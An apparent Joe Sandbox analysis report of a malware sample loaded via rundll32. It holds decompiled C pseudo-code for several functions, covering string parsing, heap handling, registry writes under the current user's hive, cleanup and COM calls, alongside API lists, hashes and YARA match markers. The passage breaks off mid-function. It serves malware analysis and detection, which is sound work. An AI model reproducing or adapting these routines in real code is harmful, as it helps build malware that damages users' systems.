                                          				intOrPtr _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t38;
                                          				void* _t40;
                                          				intOrPtr _t42;
                                          				void* _t45;
                                          				void* _t50;
                                          				void* _t52;
                                          
                                          				_t50 = __edx;
                                          				_v12 = 0;
                                          				_t23 = E04896955(0,  &_v8); // executed
                                          				if(_t23 != 0) {
                                          					_v8 = 0;
                                          				}
                                          				_t24 =  *0x489a348; // 0x9ad5a8
                                          				_t4 = _t24 + 0x489be30; // 0x52493d8
                                          				_t5 = _t24 + 0x489bdd8; // 0x4f0053
                                          				_t26 = E0489427E( &_v16, _v8, _t5, _t4); // executed
                                          				_t45 = _t26;
                                          				if(_t45 == 0) {
                                          					StrToIntExW(_v16, 0,  &_v12);
                                          					_t45 = 8;
                                          					if(_v12 < _t45) {
                                          						_t45 = 1;
                                          						__eflags = 1;
                                          					} else {
                                          						_t32 =  *0x489a348; // 0x9ad5a8
                                          						_t11 = _t32 + 0x489be24; // 0x52493cc
                                          						_t48 = _t11;
                                          						_t12 = _t32 + 0x489bdd8; // 0x4f0053
                                          						_t52 = E04896203(_t11, _t12, _t11);
                                          						_t59 = _t52;
                                          						if(_t52 != 0) {
                                          							_t35 =  *0x489a348; // 0x9ad5a8
                                          							_t13 = _t35 + 0x489be6e; // 0x30314549
                                          							if(E048913F8(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                          								_t61 =  *0x489a2fc - 6;
                                          								if( *0x489a2fc <= 6) {
                                          									_t42 =  *0x489a348; // 0x9ad5a8
                                          									_t15 = _t42 + 0x489bdba; // 0x52384549
                                          									E048913F8(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                          								}
                                          							}
                                          							_t38 =  *0x489a348; // 0x9ad5a8
                                          							_t17 = _t38 + 0x489be68; // 0x5249410
                                          							_t18 = _t38 + 0x489be40; // 0x680043
                                          							_t40 = E04893B76(_v8, 0x80000001, _t52, _t18, _t17); // executed
                                          							_t45 = _t40;
                                          							HeapFree( *0x489a2d8, 0, _t52);
                                          						}
                                          					}
                                          					HeapFree( *0x489a2d8, 0, _v16);
                                          				}
                                          				_t54 = _v8;
                                          				if(_v8 != 0) {
                                          					E04895147(_t54);
                                          				}
                                          				return _t45;
                                          			}

                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,052493D8,00000000,?,76DDF710,00000000,76DDF730), ref: 04896831
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05249410,?,00000000,30314549,00000014,004F0053,052493CC), ref: 048968CE
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04896BB4), ref: 048968E0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: ecbd9157d61333f4c34e0244b65c6bbd78695ac24676c29b3dde04b812b975e3
                                          • Instruction ID: b4d6a5e255401dd67b4e9b5d391b25b9ea8e692126ef8430b793c4e80ef1eab6
                                          • Opcode Fuzzy Hash: ecbd9157d61333f4c34e0244b65c6bbd78695ac24676c29b3dde04b812b975e3
                                          • Instruction Fuzzy Hash: B0319272A00A59BFEF159B98DC44E9E37FDEB44B04F1C0A55A600FB120E7B1BE44AB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B6BAC0: RegCreateKeyA.ADVAPI32(80000001,0614B7F0,?), ref: 00B6BAD5
                                            • Part of subcall function 00B6BAC0: lstrlen.KERNEL32(0614B7F0,00000000,00000000,00B7806E,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B6BAFE
                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,?,00B78068,00000000,00000001,00000000,?,00B7806E,00000000,?,?,?,?,00000000), ref: 00B56BBE
                                          • RegSetValueExA.KERNEL32(00B78068,00000003,00000000,00000003,00B78068,00000028), ref: 00B56BFF
                                          • RegCloseKey.ADVAPI32(?), ref: 00B56C0B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value$CloseCreateQuerylstrlen
                                          • String ID:
                                          • API String ID: 2552977122-0
                                          • Opcode ID: ec2b3e2e176d976439983f0fb990b74aa31cc68139950799925785df99e5404e
                                          • Instruction ID: de16e9254c80e8fa96f625842d0597137069166d744df77f18165dc79d2de1d4
                                          • Opcode Fuzzy Hash: ec2b3e2e176d976439983f0fb990b74aa31cc68139950799925785df99e5404e
                                          • Instruction Fuzzy Hash: 92312D75D40218EFEB21DF95DC89AAEBBF8FB04751F5040A6E849A7250DB704E88CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E0489250D(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                                          				char _v5;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				char _t28;
                                          				void* _t33;
                                          				void* _t38;
                                          				void* _t45;
                                          				char* _t46;
                                          				void* _t48;
                                          				char* _t56;
                                          				char* _t57;
                                          				intOrPtr _t59;
                                          				void* _t60;
                                          
                                          				_t56 = _a4;
                                          				_t60 = __eax;
                                          				_v12 = 0xb;
                                          				if(_t56 != 0 && __eax != 0) {
                                          					_t5 = _t60 - 1; // -1
                                          					_t46 =  &(_t56[_t5]);
                                          					_t28 =  *_t46;
                                          					_v5 = _t28;
                                          					 *_t46 = 0;
                                          					__imp__(_a8, _t45);
                                          					_v16 = _t28;
                                          					_t57 = StrStrA(_t56, _a8);
                                          					if(_t57 != 0) {
                                          						 *_t46 = _v5;
                                          						_t33 = RtlAllocateHeap( *0x489a2d8, 0, _a16 + _t60); // executed
                                          						_t48 = _t33;
                                          						if(_t48 == 0) {
                                          							_v12 = 8;
                                          						} else {
                                          							_t58 = _t57 - _a4;
                                          							E0489799E(_t57 - _a4, _a4, _t48);
                                          							_t38 = E0489799E(_a16, _a12, _t58 + _t48);
                                          							_t53 = _v16;
                                          							_t59 = _a16;
                                          							E0489799E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                                          							 *_a20 = _t48;
                                          							_v12 = _v12 & 0x00000000;
                                          							 *_a24 = _t60 - _v16 + _t59;
                                          						}
                                          					}
                                          				}
                                          				return _v12;
                                          			}

                                          APIs
                                          • lstrlen.KERNEL32(76DDF710,?,00000000,?,76DDF710), ref: 04892541
                                          • StrStrA.SHLWAPI(00000000,?), ref: 0489254E
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0489256D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 556738718-0
                                          • Opcode ID: c99346d9d96bc260da6668cad1a7bea3c39fbc5da53deb0db7f331f68edcf0a7
                                          • Instruction ID: 12f6d72fea18ba6c1d018d6900197f40ad4c20ffd823169ad78af365d379ab93
                                          • Opcode Fuzzy Hash: c99346d9d96bc260da6668cad1a7bea3c39fbc5da53deb0db7f331f68edcf0a7
                                          • Instruction Fuzzy Hash: F2217A36600609AFDF11DF68C884A9EBBB5EF84314F188A94EC44EB305D774ED15CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B69C23: lstrlen.KERNEL32(?,00000000,?,00000027,00B79208,?,00000000,?,?,?,?,?,00B5BDC2,?,00000001), ref: 00B69C59
                                            • Part of subcall function 00B69C23: lstrcpy.KERNEL32(00000000,00000000), ref: 00B69C7D
                                            • Part of subcall function 00B69C23: lstrcat.KERNEL32(00000000,00000000), ref: 00B69C85
                                          • RegOpenKeyExA.KERNEL32(00B6CC7F,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,00B6CC7F,80000001,?,00B66085), ref: 00B662BF
                                          • RegOpenKeyExA.ADVAPI32(00B6CC7F,00B6CC7F,00000000,00020019,80000001,?,00B6CC7F,80000001,?,00B66085), ref: 00B662D5
                                          • RegCloseKey.KERNEL32(80000001,80000001,?,00B66085,00B66095,?,00B6CC7F,80000001,?,00B66085), ref: 00B6631E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Open$Closelstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 4131162436-0
                                          • Opcode ID: 0a81cd893f8ae8a73b62b2bac8f1a48e1be6f2906bd5a3411ba592c51842cac1
                                          • Instruction ID: bea00a4a6191c777a17c82c6837bde685a223b47487f50c450206ea837e401e8
                                          • Opcode Fuzzy Hash: 0a81cd893f8ae8a73b62b2bac8f1a48e1be6f2906bd5a3411ba592c51842cac1
                                          • Instruction Fuzzy Hash: 9B214D7590020DBFDF00DF99DC85CAEBBFDEB08314B0000A5F904A7211D7759E559B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 47%
                                          			E04894117(char* _a4, char** _a8) {
                                          				char* _t7;
                                          				char* _t11;
                                          				char* _t14;
                                          				char* _t16;
                                          				char* _t17;
                                          				char _t18;
                                          				signed int _t20;
                                          				signed int _t22;
                                          
                                          				_t16 = _a4;
                                          				_push(0x20);
                                          				_t20 = 1;
                                          				_push(_t16);
                                          				while(1) {
                                          					_t7 = StrChrA();
                                          					if(_t7 == 0) {
                                          						break;
                                          					}
                                          					_t20 = _t20 + 1;
                                          					_push(0x20);
                                          					_push( &(_t7[1]));
                                          				}
                                          				_t11 = E04894DF6(_t20 << 2);
                                          				_a4 = _t11;
                                          				if(_t11 != 0) {
                                          					StrTrimA(_t16, 0x4899284); // executed
                                          					_t22 = 0;
                                          					do {
                                          						_t14 = StrChrA(_t16, 0x20);
                                          						if(_t14 != 0) {
                                          							 *_t14 = 0;
                                          							do {
                                          								_t14 =  &(_t14[1]);
                                          								_t18 =  *_t14;
                                          							} while (_t18 == 0x20 || _t18 == 9);
                                          						}
                                          						_t17 = _a4;
                                          						 *(_t17 + _t22 * 4) = _t16;
                                          						_t22 = _t22 + 1;
                                          						_t16 = _t14;
                                          					} while (_t14 != 0);
                                          					 *_a8 = _t17;
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,052495AC,?,?,04896940,?,052495AC), ref: 04894133
                                          • StrTrimA.SHLWAPI(?,04899284,00000002,?,04896940,?,052495AC), ref: 04894151
                                          • StrChrA.SHLWAPI(?,00000020,?,04896940,?,052495AC), ref: 0489415C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID:
                                          • API String ID: 3043112668-0
                                          • Opcode ID: 67153ee8221e8f2f8ac49fa3bb34e337d2aaeb4ad36b5eceb907cd3e509750c9
                                          • Instruction ID: 4bd139422ff29ed064d267e88973dd3292b3573c6bdcdb91c8ffb83bf9c72bf2
                                          • Opcode Fuzzy Hash: 67153ee8221e8f2f8ac49fa3bb34e337d2aaeb4ad36b5eceb907cd3e509750c9
                                          • Instruction Fuzzy Hash: 8401B171308B666FEB204E2A9C48F637ADDEBD5B44F0C0912B955CB242EA70EC03C660
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E04893E6C(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				intOrPtr _v36;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

/* 0x04893e6c */				_t27 = __edi;
/* 0x04893e73 */				_t26 = _a8;
/* 0x04893e7c */				_t14 = E04893C00(_a4, _t26, __edi); // executed
/* 0x04893e81 */				_t28 = _t14;
/* 0x04893e85 */				if(_t28 != 0) {
/* 0x04893e8f */					memset( &_v60, 0, 0x38);
/* 0x04893e94 */					_t18 =  *0x489a348; // 0x9ad5a8
/* 0x04893e99 */					_t28 = 0;
/* 0x04893e9e */					_v64 = 0x3c;
/* 0x04893ea8 */					if(_a12 == 0) {
/* 0x04893eb2 */						_t7 = _t18 + 0x489b4e8; // 0x70006f
/* 0x04893eb2 */						_t19 = _t7;
/* 0x04893eaa */					} else {
/* 0x04893eaa */						_t6 = _t18 + 0x489b8ec; // 0x750072
/* 0x04893eaa */						_t19 = _t6;
/* 0x04893eaa */					}
/* 0x04893eb8 */					_v52 = _t19;
/* 0x04893ebe */					_push(_t28);
/* 0x04893ebf */					_v48 = _a4;
/* 0x04893ec2 */					_v44 = _t26;
/* 0x04893ec5 */					_v36 = _t27;
/* 0x04893ec8 */					E048937E9();
/* 0x04893ed0 */					_push( &_v64);
/* 0x04893ed9 */					if( *0x489a100() == 0) {
/* 0x04893ee1 */						_t28 = GetLastError();
/* 0x04893ee1 */					}
/* 0x04893ee3 */					_push(1);
/* 0x04893ee5 */					E048937E9();
/* 0x04893ee5 */				}
/* 0x04893eef */				return _t28;
			}

                                          APIs
                                            • Part of subcall function 04893C00: SysAllocString.OLEAUT32(00000000), ref: 04893C5A
                                            • Part of subcall function 04893C00: SysAllocString.OLEAUT32(0070006F), ref: 04893C6E
                                            • Part of subcall function 04893C00: SysAllocString.OLEAUT32(00000000), ref: 04893C80
                                          • memset.NTDLL ref: 04893E8F
                                          • GetLastError.KERNEL32 ref: 04893EDB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocString$ErrorLastmemset
                                          • String ID: <
                                          • API String ID: 3736384471-4251816714
                                          • Opcode ID: d33c46f633e4e62b11c2a092a5dc0b4fcdb9058888640926d74f7bafac62a266
                                          • Instruction ID: ca185f04f1155c57ef5531d0829820144f4de9925b14e38285c28a7e881b253c
                                          • Opcode Fuzzy Hash: d33c46f633e4e62b11c2a092a5dc0b4fcdb9058888640926d74f7bafac62a266
                                          • Instruction Fuzzy Hash: BC012171D00618BBDF11EF99D884EDE7BF8BB08744F084A25E905E7210E775AD448BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,0614B7F0,?), ref: 00B6BAD5
                                          • RegOpenKeyA.ADVAPI32(80000001,0614B7F0,?), ref: 00B6BADF
                                          • lstrlen.KERNEL32(0614B7F0,00000000,00000000,00B7806E,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B6BAFE
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateOpenlstrlen
                                          • String ID:
                                          • API String ID: 2865187142-0
                                          • Opcode ID: 3062946f777d6f980a44351c43d1a1ecaaf4fc7a24f6158c1bed3c20c1b0c60b
                                          • Instruction ID: 9187854d0bc0b9928e84c96ea23513ec14d5362221c04c86dea424d1d5963afe
                                          • Opcode Fuzzy Hash: 3062946f777d6f980a44351c43d1a1ecaaf4fc7a24f6158c1bed3c20c1b0c60b
                                          • Instruction Fuzzy Hash: 51F06DB2100208BFE7119F90DC89FAB7BBCEB457A4F108045FD0AD6240DB759AC4C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetEvent.KERNEL32(0000039C,00B69D32), ref: 00B63ECA
                                            • Part of subcall function 00B544CE: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00B63ED5), ref: 00B544F7
                                            • Part of subcall function 00B544CE: RtlDeleteCriticalSection.NTDLL(00B79400), ref: 00B5452A
                                            • Part of subcall function 00B544CE: RtlDeleteCriticalSection.NTDLL(00B79420), ref: 00B54531
                                            • Part of subcall function 00B544CE: ReleaseMutex.KERNEL32(000005AC,00000000,?,?,?,00B63ED5), ref: 00B5455A
                                            • Part of subcall function 00B544CE: FindCloseChangeNotification.KERNEL32(?,?,00B63ED5), ref: 00B54566
                                            • Part of subcall function 00B544CE: ResetEvent.KERNEL32(00000000,00000000,?,?,?,00B63ED5), ref: 00B54572
                                            • Part of subcall function 00B544CE: CloseHandle.KERNEL32(?,?,00B63ED5), ref: 00B5457E
                                            • Part of subcall function 00B544CE: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00B63ED5), ref: 00B54584
                                            • Part of subcall function 00B544CE: SleepEx.KERNEL32(00000064,00000001,?,?,00B63ED5), ref: 00B54598
                                            • Part of subcall function 00B544CE: HeapFree.KERNEL32(00000000,00000000,?,?,00B63ED5), ref: 00B545BC
                                            • Part of subcall function 00B544CE: RtlRemoveVectoredExceptionHandler.NTDLL(02BB05B8), ref: 00B545F2
                                            • Part of subcall function 00B544CE: SleepEx.KERNEL32(00000064,00000001,?,?,00B63ED5), ref: 00B5460E
                                          • CloseHandle.KERNEL32(0000039C), ref: 00B63EDF
                                          • HeapDestroy.KERNELBASE(05D50000), ref: 00B63EEF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$Close$CriticalDeleteEventHandleHeapSection$ChangeDestroyExceptionFindFreeHandlerMutexNotificationReleaseRemoveResetVectored
                                          • String ID:
                                          • API String ID: 3503058985-0
                                          • Opcode ID: c1d70f7f4afe819d241c7ec5504dc38435495f52c8d2d0f80b58eaecac5e1144
                                          • Instruction ID: 89b50decfbbf49a14efe1ee70b94db6644aef778b75a756024249411d6ff65ad
                                          • Opcode Fuzzy Hash: c1d70f7f4afe819d241c7ec5504dc38435495f52c8d2d0f80b58eaecac5e1144
                                          • Instruction Fuzzy Hash: 85E067707502029BDB109F75EC8DB5737E8BB05B423484494F90ED39A0EF2AD9C4DA30
                                          Uniqueness

                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E048955D3(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

/* 0x048955d9 */				_v16 = _v16 & 0x00000000;
/* 0x048955de */				_t46 = _a4;
/* 0x048955eb */				_t53 = ( *_t46 & 0x000000ff) + 0x110;
/* 0x048955ee */				_v12 = 0x110;
/* 0x048955f1 */				_t24 = E04894DF6(_t53);
/* 0x048955f6 */				_a4 = _t24;
/* 0x048955fb */				if(_t24 != 0) {
/* 0x04895609 */					memcpy(_t24,  *0x489a378, 0x110);
/* 0x0489560e */					_t27 =  *0x489a37c; // 0x0
/* 0x04895613 */					_t57 = _t56 + 0xc;
/* 0x04895618 */					if(_t27 != 0) {
/* 0x0489561a */						_t51 = _a4;
/* 0x04895623 */						E048929B5(0x110, _a4, _a4, _t27, 0);
/* 0x04895623 */					}
/* 0x04895632 */					if(E048966A9( &_v36) != 0) {
/* 0x04895647 */						_t35 = E04893072(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
/* 0x0489564e */						if(_t35 == 0) {
/* 0x04895655 */							_t55 = _v20;
/* 0x0489565b */							_v36 =  *_t46;
/* 0x04895661 */							_t38 = E048917E5(_t55, _a8, _t51, _t46, _a12); // executed
/* 0x04895669 */							_v16 = _t38;
/* 0x0489566f */							 *(_t55 + 4) = _v36;
/* 0x04895672 */							_t20 =  &(_t46[4]); // 0xbf0845c7
/* 0x0489567f */							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
/* 0x04895684 */							_t57 = _t57 + 0xc;
/* 0x04895688 */							E04894C73(_t55);
/* 0x04895688 */						}
/* 0x0489564e */					}
/* 0x04895693 */					memset(_a4, 0, _t53);
/* 0x0489569e */					E04894C73(_a4);
/* 0x0489569e */				}
/* 0x048956aa */				return _v16;
			}

                                          APIs
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • memcpy.NTDLL(00000000,00000110,?,?,?,?,04896D90,?,048958B7,048958B7,?), ref: 04895609
                                          • memset.NTDLL ref: 0489567F
                                          • memset.NTDLL ref: 04895693
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 1529149438-0
                                          • Opcode ID: 707ae5f1604f9feea1d524e151f5d63dcfb5ef47bacf721fdd5a055a71e021a3
                                          • Instruction ID: 8d4bd69791e48a5043e4048219bb8aec326dbbcd8f2317e6b8e53efd11f515e0
                                          • Opcode Fuzzy Hash: 707ae5f1604f9feea1d524e151f5d63dcfb5ef47bacf721fdd5a055a71e021a3
                                          • Instruction Fuzzy Hash: 8E2121759009187FEF12AF69CC40FAE7BF8AF49644F084515F914E6250E774AE018BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

C-Code - Quality: 38%
			E04891162(intOrPtr _a4) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				short _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t98;
				intOrPtr _t100;
				void* _t106;
				void* _t108;
				intOrPtr _t112;

/* 0x0489116d */				_v48 = 0;
/* 0x04891174 */				asm("stosd");
/* 0x04891175 */				asm("stosd");
/* 0x04891176 */				asm("stosd");
/* 0x04891177 */				asm("stosw");
/* 0x0489117d */				_t49 =  *0x489a348; // 0x9ad5a8
/* 0x04891182 */				_t4 = _t49 + 0x489b450; // 0x52489f8
/* 0x0489118b */				_t82 = 0;
/* 0x0489118e */				_t5 = _t49 + 0x489b440; // 0x9ba05972
/* 0x04891195 */				_t51 =  *0x489a170(_t5, 0, 4, _t4,  &_v20); // executed
/* 0x0489119b */				_t106 = _t51;
/* 0x0489119f */				if(_t106 >= 0) {
/* 0x048911a5 */					_t53 = _v20;
/* 0x048911ad */					_push( &_v12);
/* 0x048911ae */					_push(1);
/* 0x048911b3 */					_push( &_v32);
/* 0x048911b4 */					_push(8);
/* 0x048911b6 */					_t98 =  &_v48;
/* 0x048911b9 */					_push(_t98);
/* 0x048911ba */					_push(_t98);
/* 0x048911bb */					_push(_t53); // executed
/* 0x048911c1 */					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
/* 0x04891257 */						_t56 =  *0x489a348; // 0x9ad5a8
/* 0x0489125c */						_t30 = _t56 + 0x489b430; // 0x52489d8
/* 0x04891263 */						_t31 = _t56 + 0x489b460; // 0x4c96be40
/* 0x0489126d */						_t58 =  *0x489a10c(_v12, _t31, _t30,  &_v24); // executed
/* 0x04891273 */						_t106 = _t58;
/* 0x04891275 */						_t59 = _v12;
/* 0x0489127b */						 *((intOrPtr*)( *_t59 + 8))(_t59);
/* 0x00000000 */						goto L11;
/* 0x048911c7 */					} else {
/* 0x048911c7 */						_t71 = _v20;
/* 0x048911ce */						_v16 = 0;
/* 0x048911d7 */						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
/* 0x048911db */						if(_t106 >= 0) {
/* 0x048911e1 */							_t112 = _v16;
/* 0x048911e4 */							if(_t112 == 0) {
/* 0x0489124c */								_t106 = 0x80004005;
/* 0x00000000 */								goto L11;
/* 0x048911e6 */							} else {
/* 0x048911e6 */								if(_t112 <= 0) {
/* 0x0489127e */									L11:
/* 0x04891280 */									if(_t106 >= 0) {
/* 0x00000000 */										goto L12;
/* 0x00000000 */									}
/* 0x048911ec */								} else {
/* 0x048911ec */									do {
/* 0x048911ee */										_t73 = 3;
/* 0x048911f3 */										_v48 = _t73;
/* 0x048911f7 */										_t74 = _v20;
/* 0x048911fa */										_v40 = _t82;
/* 0x048911ff */										_t108 = _t108 - 0x10;
/* 0x04891207 */										asm("movsd");
/* 0x04891208 */										asm("movsd");
/* 0x04891209 */										asm("movsd");
/* 0x0489120b */										asm("movsd");
/* 0x0489120f */										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
/* 0x04891213 */										if(_t106 < 0) {
/* 0x00000000 */											goto L7;
/* 0x04891215 */										} else {
/* 0x04891219 */											_t77 =  *0x489a348; // 0x9ad5a8
/* 0x0489121e */											_t23 = _t77 + 0x489b430; // 0x52489d8
/* 0x04891225 */											_t24 = _t77 + 0x489b460; // 0x4c96be40
/* 0x04891235 */											_t106 =  *0x489a10c(_v12, _t24, _t23,  &_v24);
/* 0x04891237 */											_t80 = _v12;
/* 0x0489123d */											 *((intOrPtr*)( *_t80 + 8))(_t80);
/* 0x04891242 */											if(_t106 >= 0) {
/* 0x04891282 */												L12:
/* 0x04891282 */												_t63 = _v24;
/* 0x0489128f */												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
/* 0x04891293 */												if(_t106 >= 0) {
/* 0x04891298 */													_t100 =  *0x489a348; // 0x9ad5a8
/* 0x0489129e */													_t67 = _v28;
/* 0x048912a3 */													_t40 = _t100 + 0x489b420; // 0x214e3
/* 0x048912ad */													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
/* 0x048912af */													_t69 = _v28;
/* 0x048912b5 */													 *((intOrPtr*)( *_t69 + 8))(_t69);
/* 0x048912b5 */												}
/* 0x048912b8 */												_t65 = _v24;
/* 0x048912be */												 *((intOrPtr*)( *_t65 + 8))(_t65);
/* 0x00000000 */											} else {
/* 0x00000000 */												goto L7;
/* 0x00000000 */											}
/* 0x04891242 */										}
/* 0x00000000 */										goto L15;
/* 0x04891244 */										L7:
/* 0x04891244 */										_t82 = _t82 + 1;
/* 0x04891245 */									} while (_t82 < _v16);
/* 0x00000000 */									goto L11;
/* 0x0489124a */								}
/* 0x048911e6 */							}
/* 0x048911e4 */						}
/* 0x048911db */					}
/* 0x048912c1 */					L15:
/* 0x048912c1 */					_t61 = _v20;
